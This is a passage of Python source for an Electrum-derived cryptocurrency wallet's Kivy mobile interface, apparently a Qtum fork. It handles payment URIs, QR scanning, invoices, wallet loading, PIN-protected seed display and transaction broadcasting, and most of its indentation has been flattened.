ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = str(intent.getDataString())
if str(intent.getScheme()).lower() in ('bitcoin', 'lightning'):
self._process_invoice_str(data)
_invoice_intent_queued = None # type: Optional[str]
def _process_invoice_str(self, invoice: str) -> None:
if not self.wallet:
self._invoice_intent_queued = invoice
return
if not self.send_screen:
self.switch_to('send')
self._invoice_intent_queued = invoice
return
if invoice.lower().startswith('qtum:'):
self.set_URI(invoice)
elif invoice.lower().startswith('lightning:'):
self.set_ln_invoice(invoice)
def _maybe_process_queued_invoice(self, *dt):
if not self.wallet:
return
invoice_queued = self._invoice_intent_queued
if invoice_queued:
self._invoice_intent_queued = None
self._process_invoice_str(invoice_queued)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
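    # Worked example (hypothetical exchange rate, not from the source): with
    # base_unit 'BTC' (decimal_point() == 8) and an exchange rate of 20000,
    # fiat_to_btc('100') computes int(10**8 * 100 / 20000) = 500000 satoshis
    # and returns the formatted string '0.005'; btc_to_fiat performs the
    # inverse conversion.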
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''Current screen orientation of the device the app is running on.
    Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
    '''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
    '''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
        # create triggers so that wallet/status/history updates happen at most twice a second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
self._periodic_process_queued_invoice = Clock.schedule_interval(self._maybe_process_queued_invoice, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('qtum:'):
self.set_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage, db):
if storage:
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
if db.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage, db)
else:
self.on_wizard_complete(None, storage, db)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
else:
def launch_wizard():
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_open_wallet(self, pw, storage):
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
try:
storage.decrypt(pw)
except StorageReadWriteError:
app.show_error(_("R/W error accessing path"))
return
self.password = pw
self._on_decrypted_storage(storage)
def on_stop(self):
self.logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
if not self.wallet.lnworker.channels:
warning1 = _("Lightning support in Electrum is experimental. "
"Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable "
"from your seed. You must backup your wallet file everytime "
"you create a new channel.")
d = Question(_('Do you want to create your first channel?') +
'\n\n' + warning1 + '\n\n' + warning2, self.open_channel_dialog_with_warning)
d.open()
else:
d = LightningOpenChannelDialog(self)
d.open()
def open_channel_dialog_with_warning(self, b):
if b:
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name)
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize the UX part of Electrum. This function performs the basic
tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might not have focus,
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
balance_sat = c + u + x + l
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
self.logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=None,
on_failure=self.stop)
d.open()
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.password = new_password
self.show_info(_("Your password was updated"))
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def change_pin_code(self, cb):
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
